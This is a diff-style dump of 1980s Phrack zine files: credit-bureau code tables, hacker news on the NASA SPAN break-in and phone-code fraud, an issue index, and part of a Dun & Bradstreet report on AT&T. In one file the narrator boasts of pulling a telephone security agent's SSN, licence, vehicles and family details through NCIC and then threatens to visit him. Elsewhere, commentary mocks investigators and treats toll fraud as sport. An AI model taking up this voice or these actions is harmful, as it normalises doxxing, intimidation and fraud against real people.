RVD Returned voluntarily, paid by dealer
|
||||
RVN Returned voluntarily
|
||||
RVP Returned voluntarily, proceeds go towards debt
|
||||
RVR Returned voluntarily, redeemed
|
||||
SET Settled for less than full balance
|
||||
STL Plate (card) stolen or lost
|
||||
TRF Transferred to another office
|
||||
|
||||
Type of Account
|
||||
---------------
|
||||
O Open account (30 or 90 days)
|
||||
R Revolving or option account (open-end)
|
||||
I Installment (fixed number of payments)
|
||||
M Mortgage
|
||||
C Check credit (line of credit at a bank)
|
||||
|
||||
Usual Manner of Payment
|
||||
-----------------------
|
||||
00 Too new to rate; approved, but not used or not rated
|
||||
01 Pays (or paid) within 30 days of billing, pays accounts as agreed
|
||||
02 Pays in more than 30 days, but not more than 60 days
|
||||
03 Pays in more than 60 days, but not more than 90 days
|
||||
04 Pays in more than 90 days, but not more than 120 days
|
||||
05 Pays in 120 days or more
|
||||
07 Makes payments under wage earner plan or similar arrangement
|
||||
08 Repossession
|
||||
8A Voluntary repossession
|
||||
8D Legal repossession
|
||||
8R Redeemed repossession
|
||||
09 Bad debt; placed for collection; suit; judgement; skip
|
||||
9B Placed for collection
|
||||
UR Unrated
|
||||
UC Unclassified
|
||||
|
||||
Kinds of Business Classification
|
||||
-------------------------------
|
||||
A Automotive
|
||||
B Banks
|
||||
C Clothing
|
||||
D Department and variety
|
||||
F Finance
|
||||
G Groceries
|
||||
H Home furnishings
|
||||
I Insurance
|
||||
J Jewelry and cameras
|
||||
K Contractors
|
||||
L Lumber, building materials
|
||||
M Medical and related health
|
||||
N National credit card
|
||||
O Oil and national credit card
|
||||
P Personal services other than medical
|
||||
Q Mail order houses
|
||||
R Real estate and public accommodations
|
||||
S Sporting goods
|
||||
T Farm and garden supplies
|
||||
U Utilities and fuel
|
||||
V Government
|
||||
W Wholesale
|
||||
X Advertising
|
||||
Y Collection services
|
||||
Z Miscellaneous
|
||||
|
||||
Type of Installment Loan
|
||||
------------------------
|
||||
AF Appliance/Furniture
|
||||
AP Airplane
|
||||
AU Automobile
|
||||
BT Boat
|
||||
CA Camper
|
||||
CL Credit line
|
||||
CM Co-maker
|
||||
CO Consolidation
|
||||
EQ Equipment
|
||||
FH FHA contract loan
|
||||
FS Finance statement
|
||||
HI Home improvement
|
||||
IN Insurance
|
||||
LE Leases
|
||||
MB Mobile home
|
||||
MC Miscellaneous
|
||||
MT Motor home
|
||||
PI Property improvement plan
|
||||
PL Personal loan
|
||||
RE Real estate
|
||||
ST Student loan
|
||||
SV Savings bond, stock, etc.
|
||||
US Unsecured
|
||||
VA Veteran loan
|
||||
|
||||
Date Codes
|
||||
----------
|
||||
A Automated, most current information available
|
||||
C Closed date
|
||||
F Repossessed/Written off
|
||||
M Further updates stopped
|
||||
P Paid
|
||||
R Reported data
|
||||
S Date of last sale
|
||||
V Verified date
|
||||
|
||||
Employment Verification Indicator
|
||||
---------------------------------
|
||||
D Declined verification
|
||||
I Indirect
|
||||
N No record
|
||||
R Reported, but not verified
|
||||
S Slow answering
|
||||
T Terminated
|
||||
V Verified
|
||||
X No reply
|
||||
|
||||
|
||||
Hope this helps. Anyone that has used Trans-Union will surely appreciate
|
||||
this, as the result codes are sometimes hard to decipher.
|
||||
|
||||
-The Disk Jockey
|
69
phrack16/8.txt
Normal file
69
phrack16/8.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
#### PHRACK PRESENTS ISSUE 16 ####
|
||||
^*^*^*^Phrack World News, Part 1^*^*^*^
|
||||
**** File 8 of 12 ****
|
||||
|
||||
|
||||
>From the 9/16 San Francisco Chronicle, page A19:
|
||||
|
||||
GERMAN HACKERS BREAK INTO NASA NETWORK (excerpted)
|
||||
|
||||
Bonn
|
||||
A group of West German computer hobbyists broke into an international
|
||||
computer network of the National Aeronautics and Space Administration and
|
||||
rummaged freely among the data for at least three months before they were
|
||||
discovered, computer enthusiasts and network users said yesterday.
|
||||
|
||||
An organization in Hamburg called the Chaos Computer Club, which
|
||||
claimed to be speaking for an anonymous group that broke into the network,
|
||||
said the illicit users managed to install a "Trojan horse," and gain entry
|
||||
into 135 computers on the European network.
|
||||
|
||||
A "Trojan Horse" is a term for a permanent program that enables
|
||||
amateur computer enthusiasts [as opposed to professionals?], or "hackers,"
|
||||
to use a password to bypass all the security procedures of a system and gain
|
||||
access to all the data in a target computer.
|
||||
|
||||
[Actually, this type of program is a 'back door' or a 'trap door.' The group
|
||||
may very well have *used* a Trojan horse to enable them to create the back
|
||||
door, but it probably wasn't a Trojan horse per se. A Trojan horse is a
|
||||
program that does something illicit and unknown to the user in addition to its
|
||||
expected task. See Phrack xx-x, "Unix Trojan Horses," for info on how to
|
||||
create a Trojan horse which in turn creates a trap door into someone's
|
||||
account.]
|
||||
|
||||
The NASA network that was broken into is called the Space Physics
|
||||
Analysis Network [ooh!] and is chiefly designed to provide authorized
|
||||
scientists and organizations with access to NASA data. The security system in
|
||||
the network was supplied by an American company, the Digital Equipment Corp.
|
||||
[Probably DECNET. Serves them right.] Users said the network is widely used
|
||||
by scientists in the United States, Britain, West Germany, Japan and five
|
||||
other countries and does not carry classified information.
|
||||
|
||||
A Chaos club spokesman, Wau Holland, denied that any data had been
|
||||
changed. This, he said, went against "hacker ethics."
|
||||
|
||||
West German television reports said that computer piracy carries a
|
||||
penalty of three years in prison in West Germany. The government has not said
|
||||
what it plans to do.
|
||||
|
||||
The Chaos club clearly views its break-in as a major coup. Holland,
|
||||
reached by telephone in Hamburg, said it was "the most successful running of a
|
||||
Trojan horse" to his knowledge, and the club sent a lengthy telex message to
|
||||
news organizations.
|
||||
|
||||
It said the "Trojan horse" was spotted by a user in August, and the
|
||||
infiltrating group then decided to go public because "they feared that they
|
||||
had entered the dangerous field of industry espionage, economic crime, East-
|
||||
West conflict...and the legitimate security interests of high-tech
|
||||
institutions."
|
||||
|
||||
The weekly magazine Stern carried an interview with several anonymous
|
||||
hobbyists who showed how they gained access to the network. One described his
|
||||
excitement when for the first time he saw on his screen, "Welcome to the NASA
|
||||
headquarters VAX installation."
|
||||
|
||||
According to Chaos, the hobbyists discovered a gap in the Digital VAX
|
||||
systems 4.4 and 4.5 and used it to install their "Trojan Horse."
|
||||
|
||||
[Excerpted and Typed by Shooting Shark. Comments by same.]
|
||||
|
51
phrack16/9.txt
Normal file
51
phrack16/9.txt
Normal file
|
@ -0,0 +1,51 @@
|
|||
#### PHRACK PRESENTS ISSUE 16 ####
|
||||
^*^*^*^Phrack World News, Part 2^*^*^*^
|
||||
**** File 9 of 12 ****
|
||||
|
||||
[Ed's Note: CertainThings in the article have been blanked (XXXXX) at the
|
||||
request of the author]
|
||||
|
||||
The Story of the Feds on XXXXXXX BBS
|
||||
By The Mad Phone Man
|
||||
|
||||
Returninghome one afternoon with a friend, I knew something wasn't
|
||||
right when I walked into the computer room. I see a "Newuser" on the board...
|
||||
and the language he's using is... well "Intimidating"...
|
||||
|
||||
"I want you all to know I'm with the OCC task force and we know who you are...
|
||||
we are going to have a little get-together and 'talk' to you all."
|
||||
|
||||
Hmmm... a loser?... I go into chat mode... "Hey dude, what's up?" I ask.
|
||||
"Your number asshole" he says.... Well, fine way to log on to a board if I do
|
||||
say.... "Hey, you know I talked to you and I know who you are.." "Oh
|
||||
yeah...Who am I?." he hesitates and says... "Well uh.. you used to work for
|
||||
Sprint didn't you?"
|
||||
I say, "No, you've got me confused with someone else I think, I'm a junior
|
||||
in high school."
|
||||
"Ohyeah?.. You got some pretty big words for a high school kid," he
|
||||
says....
|
||||
"Well, in case you didn't know, they teach English as a major these
|
||||
days...."
|
||||
He says... "Do you really want to know which LD company I'm with?"
|
||||
I say "NO, but if it will make you happy, tell me."
|
||||
He says MCI. (Whew! I don't use them)... "Well you're outta luck
|
||||
asshole, I pay for my calls, and I don't use MCI." He's dumbfounded.
|
||||
I wish him the worst as he asks me to leave his rather threatening
|
||||
post up on my board and we hang up on him.
|
||||
|
||||
Now, I'm half paralyzed... hmmm.... Check his info-form... he left a
|
||||
number in 303... Denver.... I grab the phone and call it.. It's the Stromberg
|
||||
Telephone company... Bingo.. I've got him.
|
||||
I search my user files and come up with a user called "Cocheese" from
|
||||
there, and I voice validated him, and he said he worked for a small telco
|
||||
called Stromberg... I'm onto him now.
|
||||
Later in the week, I'm in a telco office in a nearby major city, I
|
||||
happen to see a book, marked "Confidential Employee Numbers for AT&T." I
|
||||
thumb thru and lo and behold, an R.F. Stromberg works at an office of AT&T in
|
||||
Denver, and I can't cross reference him to an office. (A sure sign he's in
|
||||
security). Well, not to be out-done by this loser... I dial up NCIC and check
|
||||
for a group search for a driver's licence for him... Bingo. Licence number,
|
||||
cars he owns, his SS number, and a cross reference of the licence files finds
|
||||
his wife, two kids and a boat registered to him.
|
||||
I've never called him back, but If I do have any trouble with him, I'm
|
||||
gonna pay a little visit to Colorado....
|
50
phrack17/1.txt
Normal file
50
phrack17/1.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 1 of 12 : Phrack XVII Introduction
|
||||
|
||||
It's been a long time, but we're back. After two successful releases
|
||||
under the new editorship, Taran King told us that with his vacation from
|
||||
school, he'd be able to put Phrack Seventeen together. His plans soon
|
||||
changed, and Seventeen was now our responsibility again. Procrastination set
|
||||
in, and some difficulty was encountered in compiling the files, but we finally
|
||||
did it and here it is.
|
||||
|
||||
There's a lot of good material in this issue, and we're lucky enough to
|
||||
have PWN contributions from several sources, making it a true group effort.
|
||||
Since The Mad Chemist and Sir Francis Drake, as well as myself, are moving on
|
||||
to other things, the editorship of Phrack Inc. may be changing with the
|
||||
release of Phrack Eighteen. Regardless of what direction the publication
|
||||
takes, I know that I will have no part in the creation of the next issue, so
|
||||
I'd like to mention at this time that my involvement with the magazine, first
|
||||
as a contributor and later as a contributing editor, has been fun. Phrack
|
||||
will go on, I'm sure, for another seventeen issues at least, and will continue
|
||||
to be a primary monument to the vitality of the hacker culture.
|
||||
|
||||
-- Shooting Shark
|
||||
Contributing Editor
|
||||
|
||||
Phrack XVII Table of Contents
|
||||
-----------------------------
|
||||
|
||||
# Title Author Size
|
||||
---- ----- ------ ----
|
||||
17.1 Phrack XVII Introduction Shooting Shark 3K
|
||||
17.2 Dun & Bradstreet Report on AT&T Elric of Imrryr 24K
|
||||
17.3 D&B Report on Pacific Telesis Elric of Imrryr 26K
|
||||
17.4 Nitrogen-Trioxide Explosive Signal Substain 7K
|
||||
17.5 How to Hack Cyber Systems Grey Sorcerer 23K
|
||||
17.6 How to Hack HP2000's Grey Sorcerer 3K
|
||||
17.7 Accessing Government Computers The Sorceress 9K
|
||||
17.8 Dial-Back Modem Security Elric of Imrryr 11K
|
||||
17.9 Data Tapping Made Easy Elric of Imrryr 4K
|
||||
17.10 PWN17.1 Bust Update Sir Francis Drake 3K
|
||||
17.11 PWN17.2 "Illegal" Hacker Crackdown The $muggler 5K
|
||||
17.12 PWN17.3 Cracker are Cheating Bell The Sorceress 8K
|
||||
|
99
phrack17/10.txt
Normal file
99
phrack17/10.txt
Normal file
|
@ -0,0 +1,99 @@
|
|||
#### PHRACK PRESENTS ISSUE 17 ####
|
||||
|
||||
^*^*^*^ Phrack World News, Part 1 ^*^*^*^
|
||||
|
||||
**** File 10 of 12 ****
|
||||
|
||||
|
||||
- P H R A C K W O R L D N E W S -
|
||||
(Mainly Compiled By Sir Francis Drake)
|
||||
|
||||
2/1/88
|
||||
|
||||
|
||||
BUST UPDATE
|
||||
===========
|
||||
|
||||
All the people busted by the Secret Service last July were contacted in
|
||||
September and asked if they "wanted to talk." No one but Solid State heard
|
||||
from the S.S. after this. Solid State was prosecuted and got one year
|
||||
probation plus some required community service. The rest: Ninja NYC, Bill
|
||||
>From RNOC, Oryan QUEST, etc. are still waiting to hear. Some rumors have gone
|
||||
around that Oryan QUEST has cooperated extensively with the feds but I have no
|
||||
idea about the validity of this. The following is a short interview with
|
||||
Oryan QUEST. Remember that QUEST has a habit of lying.
|
||||
|
||||
PHRACK: Did you hear from the SS in September? It seems everybody else has.
|
||||
|
||||
QUEST: No. I haven't heard from them since I was busted. Maybe they forgot
|
||||
me.
|
||||
|
||||
P: What's your lawyer think of your case?
|
||||
|
||||
Q: He says lay low. He says it's no problem because of my age.
|
||||
|
||||
P: What do your parents think?
|
||||
|
||||
Q: They were REALLY pissed for about a week but then they relaxed. I mean I
|
||||
think my parents knew I went through enough... I mean I felt like shit.
|
||||
|
||||
P: Do you plan to keep involved in Telecom legit or otherwise?
|
||||
|
||||
Q: Uhh, I wanna call boards... I mean I can understand why a sysop wouldn't
|
||||
give me an access but... I'm thinking of putting a board up, a secure
|
||||
board just to stay in touch ya know? Cause I had a lot of fun I mean I
|
||||
just don't want to get busted again.
|
||||
|
||||
P: Any further words of wisdom?
|
||||
|
||||
Q: No matter what anyone says I'm *ELITE*. NOOOO don't put that.
|
||||
|
||||
P: Yes I am.
|
||||
|
||||
Q: No I don't want people to think I'm a dick.
|
||||
|
||||
P: Well...
|
||||
|
||||
Q: You're a dick.
|
||||
|
||||
|
||||
- On a completely different note, Taran King who as some of you know was
|
||||
busted, is going to be writing a file for Phrack about what happened real
|
||||
soon now.
|
||||
|
||||
|
||||
MEDIA
|
||||
=====
|
||||
|
||||
The big media thing has been scare stories about computer viruses,
|
||||
culminating in a one page Newsweek article written by good old Sandza and
|
||||
friends. John Markoff of the San Francisco Examiner wrote articles on
|
||||
viruses, hacking voice mailboxes, and one that should come out soon about the
|
||||
July Busts (centering on Oryan QUEST). A small scoop: He may be leaving for
|
||||
the New York Times or the San Jose Mercury.
|
||||
|
||||
Phreak media wise things have been going downhill. Besides PHRACK (which
|
||||
had a bad period but hopefully we're back for good) there is 2600, and
|
||||
Syndicate Report. Syndicate Report is dead, although their voice mail system
|
||||
is up. Sometimes. 2600 has gone from a monthly magazine to a quarterly one
|
||||
because they were losing so much money. One dead and 2 wounded.
|
||||
|
||||
|
||||
MISCELLANEOUS
|
||||
=============
|
||||
|
||||
Taran King and Knight Lightning are having a fun time in their fraternity
|
||||
at University of Missouri. Their respective GPA's are 2.1 and 2.7
|
||||
approximately.... Phantom Phreaker and Doom Prophet are in a (punk/metal)
|
||||
band... Lex Luthor is alive and writing long articles for 2600... Sir Francis
|
||||
Drake sold out and wrote phreak articles for Thrasher... Jester Sluggo has
|
||||
become vaguely active again...
|
||||
|
||||
|
||||
CONCLUSION
|
||||
==========
|
||||
|
||||
Less and less people are phreaking, the world is in sorry shape, and I'm going
|
||||
to bed. Hail Eris.
|
||||
|
||||
sfd
|
107
phrack17/11.txt
Normal file
107
phrack17/11.txt
Normal file
|
@ -0,0 +1,107 @@
|
|||
#### PHRACK PRESENTS ISSUE 17 ####
|
||||
|
||||
^*^*^*^ Phrack World News, Part 2 ^*^*^*^
|
||||
|
||||
**** File 11 of 12 ****
|
||||
|
||||
|
||||
"Illegal Hacker Crackdown"
|
||||
from the California Computer News - October 1987
|
||||
Article by Al Simmons - CCN Editor
|
||||
|
||||
Hackers beware!
|
||||
|
||||
Phone security authorities, the local police, and the Secret Service have been
|
||||
closing down on illegal hacking - electronic thievery - that is costing the
|
||||
long-distance communications companies and their customers millions of dollars
|
||||
annually. In the U.S., the loss tally on computer fraud, of all kinds, is now
|
||||
running between $3 billion and $5 a year, according to government sources.
|
||||
|
||||
"San Francisco D.A. Gets First Adult Conviction for Hacking"
|
||||
(After about 18 years, it's a about time!)
|
||||
|
||||
San Francisco, District Attorney Arlo Smith recently announced the first
|
||||
criminal conviction in San Francisco Superior Court involving an adult
|
||||
computer hacker.
|
||||
|
||||
In a report released August 31, the San Francisco District Attorney's office
|
||||
named defendant Steve Cseh, 25, of San Francisco as having pled guilty earlier
|
||||
that month to a felony of "obtaining telephone services with fraudulent
|
||||
intent" (phreaking) by means of a computer.
|
||||
|
||||
Cseh was sentenced by Superior Court Judge Laurence Kay to three years
|
||||
probation and ordered to preform 120 hours of community service.
|
||||
|
||||
Judge Kay reduced the offense to a misdemeanor in light of Cseh's making full
|
||||
restitution to U.S. Sprint - the victim phone company.
|
||||
|
||||
At the insistence of the prosecuting attorney, however, the Court ordered Cseh
|
||||
to turn his computer and modem over to U.S. Sprint to help defray the phone
|
||||
company's costs in detecting the defendant's thefts. (That's like big money
|
||||
there!)
|
||||
|
||||
A team of investigators from U.S. Sprint and Pac Tel (the gestapo) worked for
|
||||
weeks earlier this year to detect the hacking activity and trace it to Cseh's
|
||||
phone line, D.A. Arlo Smith said.
|
||||
|
||||
The case centered around the use of a computer and its software to illegally
|
||||
acquire a number of their registered users to make long-distance calls.
|
||||
|
||||
Cseh's calls were monitored for a three-week period last March. After tracing
|
||||
the activity to Cseh's phone line, phone company security people (gestapo
|
||||
stormtroopers) were able to obtain legal authority, under a federal phone
|
||||
communications statute, to monitor the origin and duration of the illegal
|
||||
calls.
|
||||
|
||||
Subsequently, the investigators along with Inspector George Walsh of the San
|
||||
Francisco Police Dept. Fraud Detail obtained a search warrant of Cseh's
|
||||
residence. Computer equipment, a software dialing program, and notebooks
|
||||
filled with codes and phone numbers were among the evidence seized, according
|
||||
to Asst. D.A. Jerry Coleman who prosecuted the case.
|
||||
|
||||
U.S Sprint had initially reported more than $300,000 in losses from the use of
|
||||
their codes during the past two years; however, the investigation efforts
|
||||
could only prove specific losses of a lesser amount traceable to Cseh during
|
||||
the three-week monitoring period.
|
||||
|
||||
"It is probable that other computer users had access to the hacked Sprint
|
||||
codes throughout the country due to dissemination on illegal computer bulletin
|
||||
boards," added Coleman (When where BBS's made illegal Mr. Coleman?)
|
||||
|
||||
"Sacramento Investigators Breakup Tahoe Electronic Thefts"
|
||||
|
||||
Meanwhile, at South Shore Lake Tahoe, Secret Service and phone company
|
||||
investigators arrested Thomas Gould Alvord, closing down an electronic theft
|
||||
ring estimated to have rung up more than $2 million in unauthorized calls.
|
||||
|
||||
A Sacramento Bee story, filed by the Bee staff writers Ted Bell and Jim Lewis,
|
||||
reported that Alvord, 37, was arrested September 9, on five felony counts of
|
||||
computer hacking of long-distance access codes to five private telephone
|
||||
companies.
|
||||
|
||||
Alvord is said to have used an automatic dialer, with computer programmed
|
||||
dialing formulas, enabling him to find long-distance credit card numbers used
|
||||
by clients of private telephone companies, according to an affidavit filed in
|
||||
Sacramento's District Court.
|
||||
|
||||
The affidavit, filed by William S. Granger, a special agent of the Secret
|
||||
Service, identified Paula Hayes, an investigator for Tel-America of Salt Lake
|
||||
City, as the undercover agent who finally brought an end to Alvord's South
|
||||
Shore Electronic Co. illegal hacking operation. Hayes worked undercover to
|
||||
purchase access codes from Alvord.
|
||||
|
||||
Agent Garanger's affidavit lists U.S. Sprint losses at $340,000 but Sprint
|
||||
spokesman Jenay Cottrell said that figure "could grow considerably," according
|
||||
to the Bee report.
|
||||
|
||||
One stock brokerage firm, is reported to have seen its monthly Pacific Bell
|
||||
telephone bill climb steadily from $3,000 in April to $72,000 in August. The
|
||||
long-distance access codes of the firm were among those traced to Alvord's
|
||||
telephones, according to investigators the Bee said.
|
||||
|
||||
Alvord was reportedly hacking access codes from Sprint, Pacific Bell, and
|
||||
other companies and was selling them to truck drivers for $60 a month. Alvord
|
||||
charged companies making overseas calls and larger businesses between $120 and
|
||||
$300 a month for the long-distance services of his South Shore Electronics Co.
|
||||
|
||||
>From The $muggler
|
145
phrack17/12.txt
Normal file
145
phrack17/12.txt
Normal file
|
@ -0,0 +1,145 @@
|
|||
#### PHRACK PRESENTS ISSUE 17 ####
|
||||
|
||||
^*^*^*^ Phrack World News, Part 3 ^*^*^*^
|
||||
|
||||
**** File 12 of 12 ****
|
||||
|
||||
|
||||
+-------------------------------------------------------------------------+
|
||||
-[ PHRACK XVII ]-----------------------------------------------------------
|
||||
|
||||
"The Code Crackers are Cheating Ma Bell"
|
||||
Typed by the Sorceress from the San Francisco Chronicle
|
||||
Edited by the $muggler
|
||||
|
||||
The Far Side..........................(415)471-1138
|
||||
Underground Communications, Inc.......(415)770-0140
|
||||
|
||||
+-------------------------------------------------------------------------+
|
||||
In California prisons, inmates use "the code" to make free telephone calls
|
||||
lining up everything from gun running jobs to visits from grandma.
|
||||
|
||||
In a college dormitory in Tennessee, students use the code to open up a
|
||||
long-distance line on a pay phone for 12 straight hours of free calls.
|
||||
|
||||
In a phone booth somewhere in the Midwest, a mobster uses the code to make
|
||||
untraceable calls that bring a shipment of narcotics from South America to the
|
||||
United States.
|
||||
|
||||
The code is actually millions of different personal identification numbers
|
||||
assigned by the nation's telephone companies. Fraudulent use of those codes
|
||||
is now a nationwide epidemic that is costing America's phone companies more
|
||||
than $500 million each year.
|
||||
|
||||
In the end, most of that cost is passed on to consumers, in the form of higher
|
||||
phone rates, analysts say.
|
||||
|
||||
The security codes range form multidigit access codes used by customers of the
|
||||
many alternative long-distance companies to the "calling card" numbers
|
||||
assigned by America Telephone & Telegraph and the 22 local phone companies,
|
||||
such as Pacific Bell.
|
||||
|
||||
Most of the loss comes form the activities of computer hackers, said Rene
|
||||
Dunn, speaking for U.S. Sprint, the third-largest long-distance company.
|
||||
|
||||
These technical experts - frequently bright, if socially reclusive, teenagers
|
||||
- set up their computers to dial the local access telephone number of one of
|
||||
the alternative long-distance firms, such as MCI and U.S. Sprint. When the
|
||||
phone answers, a legitimate customer would normally punch in a secret personal
|
||||
code, usually five digits, that allows him to make his call.
|
||||
|
||||
Hackers, however, have devised computer programs that will keep firing
|
||||
combinations of numbers until it hits the right combination, much like a
|
||||
safecracker waiting for the telltale sound of pins and tumblers meshing.
|
||||
|
||||
Then the hacker- known in the industry as a "cracker" because he has cracked
|
||||
the code- has full access to that customer's phone line.
|
||||
|
||||
The customer does not realize what has happened until a huge phone bill
|
||||
arrives at the end of the month. By that time, his access number and personal
|
||||
code have been tacked up on thousands of electronic bulletin boards throughout
|
||||
the country, accessible to anyone with a computer, a telephone and a modem,
|
||||
the device that allows the computer to communicate over telephone lines.
|
||||
|
||||
"This is definitely a major problem," said one telephone security expert, who
|
||||
declined to be identified. "I've seen one account with a $98,000 monthly
|
||||
bill."
|
||||
|
||||
One Berkeley man has battled the telephone cheats since last fall, when his
|
||||
MCI bill showed about $100 in long-distance calls he had not made.
|
||||
|
||||
Although MCI assured him that the problem would be taken care of, the man's
|
||||
latest bill was 11 pages long and has $563.40 worth of long-distance calls.
|
||||
Those calls include:
|
||||
|
||||
[] A two-hour call to Hyattsville, Maryland, on January 22. A woman who
|
||||
answered the Hyattsville phone said she had no idea who called her house.
|
||||
|
||||
[] Repeated calls to a dormitory telephone at UCLA. The student who answered
|
||||
the phone there said she did not know who spent 39 minutes talking to her,
|
||||
or her roommate, shortly after midnight on January 23.
|
||||
|
||||
[] Calls to dormitory rooms at Washington State University in Pullman and to
|
||||
the University of Colorado in Boulder. Men who answered the phones there
|
||||
professed ignorance of who had called them or of any stolen long-distance
|
||||
codes.
|
||||
|
||||
The Berkeley customer, who asked not to be identified, said he reached his
|
||||
frustration limit and canceled his MCI account.
|
||||
|
||||
The phone companies are pursing the hackers and other thieves with methods
|
||||
that try to keep up with a technological monster that is linked by trillions
|
||||
of miles of telephone lines.
|
||||
|
||||
The companies sometimes monitor customers' phone bills. If a bill that
|
||||
averages about $40 or $50 a month suddenly soars to several hundred dollars
|
||||
with calls apparently placed from all over the country on the same day, the
|
||||
phone company flags the bill and tries to track the source of the calls.
|
||||
|
||||
The FBI makes its own surveillance sweeps of electronic bulletin boards,
|
||||
looking for stolen code numbers. The phone companies occasionally call up
|
||||
these boards and post messages, warning that arrest warrants will be coming
|
||||
soon if the fraudulent practice does not stop. Reputable bulletin boards post
|
||||
their own warnings to telephone hackers, telling them to stay out.
|
||||
|
||||
Several criminal prosecutions are already in the works, said Jocelyne Calia,
|
||||
the manager of toll fraud for U.S. Sprint.
|
||||
|
||||
If the detectives do not want to talk about their methods, the underground is
|
||||
equally circumspect. "If they (the companies) have effective (prevention)
|
||||
methods, how come all this is still going on?" asked one computer expert, a
|
||||
veteran hacker who says he went legitimate about 10 years ago.
|
||||
|
||||
The computer expert, who identified himself only as Dr. Strange, said he was
|
||||
part of the original group of electronic wizards of the early 1970s who
|
||||
devised the "blue boxes" complex instruments that emulate the tones of a
|
||||
telephone and allowed these early hackers to break into the toll-free 800
|
||||
system and call all over the world free of charge.
|
||||
|
||||
The new hacker bedeviling the phone companies are simply the result of the
|
||||
"technology changing to one of computers, instead of blue boxes" Dr. Strange
|
||||
said. As the "phone company elevates the odds... the bigger a challenge it
|
||||
becomes," he said.
|
||||
|
||||
A feeling of ambivalence toward the huge and largely anonymous phone companies
|
||||
makes it easier for many people to rationalize their cheating. A woman in a
|
||||
Southwestern state who obtained an authorization code from her boyfriend said,
|
||||
through an intermediary, that she never really thought of telephone fraud as a
|
||||
"moral issue." "I don't abuse it," the woman said of her newfound telephone
|
||||
privilege. "I don't use it for long periods of time - I never talk for more
|
||||
than an hour at a time - and I don't give it out to friends." Besides, she
|
||||
said, the bills for calls she has been making all over the United States for
|
||||
the past six weeks go to a "large corporation that I was dissatisfied with.
|
||||
It's not as if an individual is getting the bills."
|
||||
|
||||
There is one place, however, where the phone companies maybe have the upper
|
||||
hand in their constant war with the hackers and cheats.
|
||||
|
||||
In some prisons, said an MCI spokesman, "we've found we can use peer pressure.
|
||||
Let's say we restrict access to the phones, or even take them out, and there
|
||||
were a lot of prisoners who weren't abusing the phone system. So the word
|
||||
gets spread to those guys about which prisoner it was that caused the
|
||||
telephones to get taken out. Once you get the identification (of the
|
||||
phone-abusing prisoner) out there, I don't think you have to worry much" the
|
||||
spokesman said. "There's a justice system in the prisons, too."
|
||||
|
461
phrack17/2.txt
Normal file
461
phrack17/2.txt
Normal file
|
@ -0,0 +1,461 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 2 of 12 : Dun & Bradstreet Report on AT&T
|
||||
|
||||
|
||||
|
||||
AT&T Credit File, taken from Dun & Bradstreet by Elric of Imrryr
|
||||
|
||||
|
||||
|
||||
|
||||
DUN'S FINANCIAL RECORDS
|
||||
COPYRIGHT (C) 1987
|
||||
DUN & BRADSTREET CREDIT SERVICE
|
||||
Name & Address:
|
||||
AMERICAN TELEPHONE AND TELEGRAPH Trade-Style Name:
|
||||
550 Madison Ave AT & T
|
||||
NEW YORK, NY 10022
|
||||
|
||||
Telephone: 212-605-5300
|
||||
|
||||
DUNS Number: 00-698-0080
|
||||
|
||||
Line of Business: TELECOMMUNICATIONS SVCS TELE
|
||||
|
||||
Primary SIC Code: 4811
|
||||
Secondary SIC Codes: 4821 3661 3357 3573 5999
|
||||
|
||||
Year Started: 1885 (12/31/86) COMBINATION FISCAL
|
||||
Employees Total: 317,000 Sales: 34,087,000,000
|
||||
Employees Here: 1,800 Net Worth: 14,462,000,000
|
||||
|
||||
This is a PUBLIC company
|
||||
|
||||
|
||||
12/31/86 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS % COMPANY INDST
|
||||
COMPANY CHANGE % NORM %
|
||||
Cash. . . . . . . . . . . . . 2,602,000 17.5 6.7 9.0
|
||||
Accounts Receivable . . . . . 7,820,000 (13.1) 20.1 5.7
|
||||
Notes Receivable. . . . . . . ---- ---- ---- 0.2
|
||||
Inventory . . . . . . . . . . 3,519,000 (26.1) 9.1 1.3
|
||||
Other Current Assets. . . . . 1,631,000 72.0 4.2 5.8
|
||||
|
||||
Total Current Assets. . . . . 15,572,000 (8.0) 40.0 22.0
|
||||
|
||||
Fixed Assets. . . . . . . . . 21,078,000 (4.7) 54.2 35.6
|
||||
Other Non-current Assets. . . 2,233,000 55.9 5.7 42.4
|
||||
|
||||
Total Assets. . . . . . . . . 38,883,000 (3.9) 100.0 100.0
|
||||
|
||||
Accounts Payable. . . . . . . 4,625,000 (6.4) 11.9 4.2
|
||||
Bank Loans. . . . . . . . . . ---- ---- ---- 0.2
|
||||
|
||||
Notes Payable . . . . . . . . ---- ---- ---- 1.0
|
||||
Other Current Liabilities . . 6,592,000 0.8 17.0 6.2
|
||||
|
||||
Total Current Liabilities . . 11,217,000 (2.4) 28.8 11.6
|
||||
|
||||
Other Long Term Liab. . . . . 13,204,000 38.2 34.0 46.8
|
||||
Deferred Credits. . . . . . . ---- ---- ---- 6.4
|
||||
Net Worth . . . . . . . . . . 14,462,000 (1.2) 37.2 35.2
|
||||
|
||||
Total Liabilities & Worth. . 38,883,000 (3.9) 100.0 100.0
|
||||
|
||||
Net Sales . . . . . . . . . . 34,087,000 (2.4) 100.0 100.0
|
||||
Gross Profit. . . . . . . . . 15,838,000 ---- 46.5 40.1
|
||||
Net Profit After Tax. . . . . 139,000 (91.1) 0.4 15.3
|
||||
Dividends/Withdrawals . . . . 1,371,000 (0.9) 4.0 7.7
|
||||
Working Capital . . . . . . . 4,355,000 (19.8) ---- ----
|
||||
|
||||
RATIOS % ---INDUSTRY QUARTILES---
|
||||
COMPANY CHANGE UPPER MEDIAN LOWER
|
||||
(SOLVENCY)
|
||||
|
||||
Quick Ratio . . . . . . . . . 0.9 (10.0) 2.9 1.2 0.6
|
||||
Current Ratio . . . . . . . . 1.4 (6.7) 4.9 2.2 1.0
|
||||
Curr Liab to Net Worth (%). . 77.6 (1.1) 13.2 26.4 38.1
|
||||
Curr Liab to Inventory (%). . 318.8 32.1 244.8 475.8 675.0
|
||||
Total Liab to Net Worth (%) . 168.9 (4.3) 127.4 180.2 297.2
|
||||
